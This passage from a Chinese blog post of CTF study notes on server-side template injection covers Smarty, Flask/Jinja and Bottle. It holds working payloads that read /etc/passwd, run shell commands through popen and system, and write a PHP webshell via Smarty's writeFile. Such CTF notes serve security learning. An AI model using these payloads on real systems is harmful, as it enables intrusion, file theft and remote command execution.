$smarty-&gt;display(&quot;string:&#123;*phpinfo()*&#125;&quot;);
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">`Smarty` 解析 `&#123;* phpinfo() *&#125;` 作为 **模板注释**，不会执行。但如果换成：</span><br><span class="line"></span><br></pre></td></tr></table></figure>
bash


复制编辑
X-Forwarded-For: &#123;$smarty.version&#125;
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">代码执行后：</span><br><span class="line"></span><br></pre></td></tr></table></figure>
php


复制编辑
$smarty-&gt;display(&quot;string:&#123;$smarty.version&#125;&quot;);
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">  这样，Smarty 会解析 `&#123;$smarty.version&#125;`，并显示 **Smarty 版本号**。</span><br><span class="line"></span><br><span class="line">- 进一步利用，比如：</span><br><span class="line"></span><br></pre></td></tr></table></figure>
scss


复制编辑
X-Forwarded-For: &#123;phpinfo()&#125;
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">  如果 **PHP 允许 `Smarty` 解析 `php` 标签**，就会执行 `phpinfo()`，泄露 PHP 配置信息。</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">{% asset_img "QQ20250304-170345.png" "QQ20250304-170345" %}</span><br><span class="line"></span><br><span class="line">## smarty模板操作手册</span><br><span class="line"></span><br><span class="line">从这里开始就有点难懂</span><br><span class="line"></span><br><span class="line">大白话理解版本：</span><br><span class="line"></span><br><span class="line">当你通过分支图确定是smarty模板</span><br><span class="line"></span><br></pre></td></tr></table></figure>
</code></pre>
</li>
</ul>
<p>a{<em>conmmet</em>b}</p>
</blockquote>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">没有回显comment的值，就可以确定&#123;$smarty.version&#125;</span><br><span class="line"></span><br><span class="line">下面有1+3个可以选</span><br><span class="line"></span><br><span class="line"># 以下我都是直接复制过来没仔细看获取类的静态方法根本没看懂</span><br><span class="line"></span><br><span class="line">### 获取类的静态方法：</span><br><span class="line"></span><br><span class="line">$smarty内置变量可用于访问各种环境变量，比如我们使用 self 得到 smarty 这个类以后，我们就去找 smarty 给我们的方法:</span><br><span class="line"></span><br><span class="line">#### getStreamVariable():</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p>public function getStreamVariable($variable)&#x2F;&#x2F;variable其实就是文件路径<br>{<br>        $_result &#x3D; ‘’;<br>        $fp &#x3D; fopen($variable, ‘r+’);&#x2F;&#x2F;从此处开始对文件进行读取<br>        if ($fp) {<br>            while (!feof($fp) &amp;&amp; ($current_line &#x3D; fgets($fp)) !&#x3D;&#x3D; false) {<br>                $_result .&#x3D; $current_line;<br>            }<br>            fclose($fp);<br>            return $_result;<br>        }<br>        $smarty &#x3D; isset($this-&gt;smarty) ? $this-&gt;smarty : $this;<br>        if ($smarty-&gt;error_unassigned) {<br>            throw new SmartyException(‘Undefined stream variable “‘ . $variable . ‘“‘);<br>        } else {<br>            return null;<br>        }<br>    }<br>&#x2F;&#x2F;可以看到这个方法可以读取一个文件并返回其内容，所以我们可以用self来获取Smarty对象并调用这个方法<br>smarty&#x2F;libs&#x2F;sysplugins&#x2F;smarty_internal_data.php　　——&gt;　　getStreamVariable() 这个方法可以获取传入变量的流<br>例如：<br>{self::getStreamVariable(“file:&#x2F;&#x2F;&#x2F;etc&#x2F;passwd”)}</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">- 不过这种利用方式只存在于旧版本中，而且在 3.1.30 的 Smarty 版本中官方已经将 `getStreamVariable` 静态方法删除。</span><br><span class="line"></span><br><span class="line">#### writeFile：</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p>public function writeFile($_filepath, $_contents, Smarty $smarty)<br>&#x2F;&#x2F;我们可以发现第三个参数$smarty其实就是一个smarty模板类型，要求是拒绝非Smarty类型的输入，这就意味着我们需要获取对Smarty对象的引用，然后我们在smarty中找到了 self::clearConfig()：<br>public function clearConfig($varname &#x3D; null)<br>{<br>    return Smarty_Internal_Extension_Config::clearConfig($this, $varname);<br>}<br>smarty&#x2F;libs&#x2F;sysplugins&#x2F;smarty_internal_write_file.php　　——&gt;　　Smarty_Internal_Write_File 这个类中有一个writeFile方法<br>{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,”<?php passthru($_GET['cmd']); ?>“,self::clearConfig())}</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">但是writeFile方法也有版本限制，所以我们首先要确定模板的版本，再决定对应的攻击方法。</span><br><span class="line"></span><br><span class="line">### `&#123;php&#125;&#123;/php&#125;`</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p>{php}phpinfo();{&#x2F;php}  #执行相应的php代码</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">Smarty支持使用 &#123;php&#125;&#123;/php&#125; 标签来执行被包裹其中的php指令，最常规的思路自然是先测试该标签。但因为在Smarty3版本中已经废弃&#123;php&#125;标签，强烈建议不要使用。在Smarty 3.1，&#123;php&#125;仅在SmartyBC中可用。</span><br><span class="line"></span><br><span class="line">### `&#123;literal&#125;`</span><br><span class="line"></span><br><span class="line">- &#123;literal&#125; 可以让一个模板区域的字符原样输出。这经常用于保护页面上的Javascript或css样式表，避免因为 Smarty 的定界符而错被解析。</span><br><span class="line">- 在 PHP5 环境下存在一种 PHP 标签， `&lt;script&gt;language=&quot;php&quot;&gt;&lt;/script&gt;，`我们便可以利用这一标签进行任意的 PHP 代码执行。</span><br><span class="line">- 通过上述描述也可以想到，我们完全可以利用这一种标签来实现 XSS 攻击，这一种攻击方式在 SSTI 中也是很常见的，因为基本上所有模板都会因为需要提供类似的功能。</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p>{literal}alert(‘xss’);{&#x2F;literal}</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">### `&#123;if&#125;&#123;/if&#125;`</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p>{if phpinfo()}{&#x2F;if}</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">Smarty的 &#123;if&#125; 条件判断和PHP的if非常相似，只是增加了一些特性。每个&#123;if&#125;必须有一个配对的&#123;/if&#125;，也可以使用&#123;else&#125; 和 &#123;elseif&#125;，全部的PHP条件表达式和函数都可以在if内使用，如`||`，`or`，`&amp;&amp;`，`and`，`is_array()`等等，如：</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p>{if is_array($array)}{&#x2F;if}</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">还可以用来执行命令：</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p>{if phpinfo()}{&#x2F;if}<br>{if readfile (‘&#x2F;flag’)}{&#x2F;if}<br>{if show_source(‘&#x2F;flag’)}{&#x2F;if}<br>{if system(‘cat &#x2F;flag’)}{&#x2F;if}</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">这道题的版本为3.1.30</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p>&#x2F;&#x2F;所以这个位置我们不能够使用获取类的静态方法来进行攻击，也不能用php标签来进行攻击。<br>&#x2F;&#x2F;又因为php的版本是php7，所以我们不能用literal标签，最后我们使用if来进行攻击</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">参考：[Smarty模板注入&amp;CVE-2017-1000480](https://xz.aliyun.com/news/11666?time__1311=eqUxuQDtDQitWkxBkFDnQFeG%3D2KiIxG8mKeD&amp;u_atoken=d1877f7d5e5153ab62305384a28e30a9&amp;u_asig=1a0c399a17410769091401613e00c7)</span><br><span class="line"></span><br><span class="line"># ezzz_ssti</span><br><span class="line"></span><br><span class="line">啥也没有过滤，可以直接打，但是把长度限制为40</span><br><span class="line"></span><br><span class="line">这么长的payload已经是极限</span><br><span class="line"></span><br><span class="line">Flask 框架中存在 **config 全局对象**，用来保存配置信息。config 对象实质上是一个**字典的子类**，可以像字典一样操作。在单次运行的 flask 实例中，`config` 是可保存的。要更新字典，我们可以使用字典中的update()方法</span><br><span class="line"></span><br><span class="line">用 **update() 方法** + **关键字参数**更新字典从而实现长度的绕过！</span><br><span class="line"></span><br><span class="line">Jinja 模板中存在 **set 语句**，用来设置模板中的变量：&#123;% set var=&#x27;test&#x27; %&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">&#123;%set x=config.update(a=config.update)%&#125; </span><br><span class="line">&#123;%set x=config.a(b=lipsum.__globals__)%&#125; </span><br><span class="line">&#123;%set x=config.a(c=config.b.os)%&#125;</span><br><span class="line">&#123;%set x=config.a(d=config.c.popen)%&#125; </span><br><span class="line">&#123;&#123;config.d(&#x27;ls /&#x27;).read()&#125;&#125; </span><br><span class="line">&#123;&#123;config.d(&#x27;cat /f*&#x27;).read()&#125;&#125;</span><br><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure>



<p>OR:</p>
<p>先把 <code>update()</code> 方法写入 <code>config</code> 中，用来省几个字符：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;config.update(a=config.update)&#125;&#125;</span><br></pre></td></tr></table></figure>

<p>然后我们可以通过 <code>&#123;&#123;config&#125;&#125;</code> 来查看有没有写入成功。这里是可以看到写入成功了的。所以我们就利用 <code>config.a</code> 来更新 <code>config</code> 字典。我们把之前的 payload 拆解一下写入变量就行，先把 os 模块获得：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;config.a(b=lipsum.__globals__.os)&#125;&#125;</span><br></pre></td></tr></table></figure>

<p>然后，我们就可以执行 popen 了：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;config.b.popen(&#x27;cat /flag&#x27;).read()&#125;&#125;</span><br></pre></td></tr></table></figure>

<p>OR</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;config.update(l=lipsum)&#125;&#125;</span><br><span class="line">&#123;&#123;config.update(g=request.args.a)&#125;&#125;&amp;a=__globals__</span><br><span class="line">&#123;&#123;config.update(f=config.l)&#125;&#125;</span><br><span class="line">&#123;&#123;config.update(f=f|attr(config.g))&#125;&#125;</span><br><span class="line">&#123;&#123;config.update(f=config.l[config.g])&#125;&#125;</span><br><span class="line">&#123;&#123;config.update(o=config.f.os)&#125;&#125;</span><br><span class="line">&#123;&#123;config.update(p=config.o.popen)&#125;&#125;</span><br><span class="line">&#123;&#123;config.p(request.args.c).read()&#125;&#125;&amp;c=cat</span><br></pre></td></tr></table></figure>

<p><a target="_blank" rel="noopener" href="https://www.bx33661.com/archives/py-flask-ssti-chang-du-xian-zhi-rao-guo">Py flask SSTI 长度限制绕过</a></p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/weixin_43995419/article/details/126811287">Python Flask SSTI 之 长度限制绕过</a></p>
<h1 id="VNCTF-学生姓名登记系统"><a href="#VNCTF-学生姓名登记系统" class="headerlink" title="VNCTF 学生姓名登记系统"></a>VNCTF 学生姓名登记系统</h1><p>框架:bottle</p>
<h1 id="别问我怎么知道框架是bottle的我也不知道"><a href="#别问我怎么知道框架是bottle的我也不知道" class="headerlink" title="别问我怎么知道框架是bottle的我也不知道"></a>别问我怎么知道框架是bottle的我也不知道</h1><ul>
<li><p><strong>defined</strong>(<em>name</em>)</p>
<p>如果变量已定义则返回True，反之返回False。</p>
</li>
<li><p><strong>get</strong>(<em>name</em>, <em>default&#x3D;None</em>)<a target="_blank" rel="noopener" href="https://www.osgeo.cn/bottle/stpl.html#stpl.get">¶</a></p>
<p>返回该变量，或一个默认值</p>
</li>
<li><p><strong>setdefault</strong>(<em>name</em>, <em>default</em>)</p>
<p>如果该变量未定义，则定义它，赋一个默认值，返回该变量</p>
</li>
</ul>
<p>下面是使用了这三个函数的例子，实现了模板中的可选参数。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">% <span class="title function_ invoke__">setdefault</span>(<span class="string">&#x27;text&#x27;</span>, <span class="string">&#x27;No Text&#x27;</span>)</span><br><span class="line">&lt;h1&gt;&#123;&#123;<span class="title function_ invoke__">get</span>(<span class="string">&#x27;title&#x27;</span>, <span class="string">&#x27;No Title&#x27;</span>)&#125;&#125;&lt;/h1&gt;</span><br><span class="line">&lt;p&gt; &#123;&#123; text &#125;&#125; &lt;/p&gt;</span><br><span class="line">% <span class="keyword">if</span> <span class="title function_ invoke__">defined</span>(<span class="string">&#x27;author&#x27;</span>):</span><br><span class="line">  &lt;p&gt;By &#123;&#123; author &#125;&#125;&lt;/p&gt;</span><br><span class="line">% end</span><br></pre></td></tr></table></figure>

<p>通过测试如下payload，我们确认是bottle框架：</p>
<figure class="highlight less"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;<span class="selector-tag">setdefault</span>(<span class="string">&#x27;a&#x27;</span>,<span class="string">&#x27;b&#x27;</span>)&#125;&#125;</span><br><span class="line">&#123;&#123;<span class="selector-tag">a</span>&#125;&#125;</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">payload:</span><br><span class="line">&#123;&#123;a:=&#x27;&#x27;.__class__&#125;&#125;</span><br><span class="line">&#123;&#123;b:=a.__base__&#125;&#125;</span><br><span class="line">&#123;&#123;c:=b.__subclasses__&#125;&#125;</span><br><span class="line">&#123;&#123;d:=c()&#125;&#125;</span><br><span class="line">&#123;&#123;e:=d[154]&#125;&#125;</span><br><span class="line">&#123;&#123;f:=e.__init__&#125;&#125;</span><br><span class="line">&#123;&#123;g:=f.__globals__&#125;&#125;</span><br></pre></td></tr></table></figure>

<p><a target="_blank" rel="noopener" href="https://www.cnblogs.com/LAMENTXU/articles/18705991">VNCTF 2025 web wp </a></p>

    </div>

    
    
    

    <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/%E7%AC%94%E8%AE%B0/" rel="tag"><i class="fa fa-tag"></i> 笔记</a>
              <a href="/tags/SSTI/" rel="tag"><i class="fa fa-tag"></i> SSTI</a>
          </div>

        
  <div class="social-like a2a_kit a2a_kit_size_32 a2a_default_style">
    <a class="a2a_dd" target="_blank" rel="noopener" href="https://www.addtoany.com/share"></a>
      <a class="a2a_button_facebook"></a>
      <a class="a2a_button_twitter"></a>
  </div>

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2025/03/01/%E5%8D%9A%E5%AE%A2%E5%BB%BA%E8%AE%BE%E8%AE%B0%E5%BD%95/" rel="prev" title="博客建设记录">
                  <i class="fa fa-angle-left"></i> 博客建设记录
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/2025/03/02/SWPUCTF-2021-%E6%96%B0%E7%94%9F%E8%B5%9B-%E7%AE%80%E7%AE%80%E5%8D%95%E5%8D%95%E7%9A%84%E9%80%BB%E8%BE%91/" rel="next" title="[SWPUCTF 2021 新生赛]简简单单的逻辑">
                  [SWPUCTF 2021 新生赛]简简单单的逻辑 <i class="fa fa-angle-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






    <div class="comments" id="waline"></div>
</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">

  <div class="copyright">
    &copy; 
    <span itemprop="copyrightYear">2025</span>
    <span class="with-love">
      <i class="fa fa-heart"></i>
    </span>
    <span class="author" itemprop="copyrightHolder">温柔刀</span>
  </div>
<div class="wordcount">
  <span class="post-meta-item">
    <span class="post-meta-item-icon">
      <i class="fa fa-chart-line"></i>
    </span>
      <span>站点总字数：</span>
    <span title="站点总字数">27k</span>
  </span>
  <span class="post-meta-item">
    <span class="post-meta-item-icon">
      <i class="fa fa-coffee"></i>
    </span>
      <span>站点阅读时长 &asymp;</span>
    <span title="站点阅读时长">1:37</span>
  </span>
</div>

    </div>
  </footer>

  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>
  <div class="sidebar-dimmer"></div>
  <div class="back-to-top" role="button" aria-label="返回顶部">
    <i class="fa fa-arrow-up fa-lg"></i>
    <span>0%</span>
  </div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


  
  <script src="https://cdnjs.cloudflare.com/ajax/libs/animejs/3.2.1/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous"></script>
<script src="/js/comments.js"></script><script src="/js/utils.js"></script><script src="/js/motion.js"></script><script src="/js/sidebar.js"></script><script src="/js/next-boot.js"></script>

  




  <script src="/js/third-party/pace.js"></script>

  <script src="/js/third-party/addtoany.js"></script>

  




<script class="next-config" data-name="waline" type="application/json">{"lang":"zh-cn","enable":true,"serverURL":"comment-three-tau.vercel.app","cssUrl":"https://unpkg.com/@waline/client@v2/dist/waline.css","commentCount":true,"pageview":false,"placeholder":"说两句吧~","avatar":"mm","meta":["nick","mail","link"],"pageSize":10,"visitor":true,"comment_count":true,"requiredFields":["nick","mail"],"libUrl":"//unpkg.com/@waline/client@v2/dist/waline.js","el":"#waline","comment":true,"path":"/2025/03/01/SSTI%E9%9B%86%E4%B8%AD%E5%AD%A6%E4%B9%A0%E9%A2%98%E7%9B%AE%E6%B1%87%E6%80%BB/"}</script>
<link rel="stylesheet" href="https://unpkg.com/@waline/client@v2/dist/waline.css">
<script>
document.addEventListener('page:loaded', () => {
  NexT.utils.loadComments(CONFIG.waline.el).then(() =>
    NexT.utils.getScript(CONFIG.waline.libUrl, { condition: window.Waline })
  ).then(() => 
    Waline.init(Object.assign({}, CONFIG.waline,{ el: document.querySelector(CONFIG.waline.el) }))
  );
});
</script>

</body>
</html>

<!-- 页面点击小红心 -->
<script type="text/javascript" src="/js/src/clicklove.js"></script>
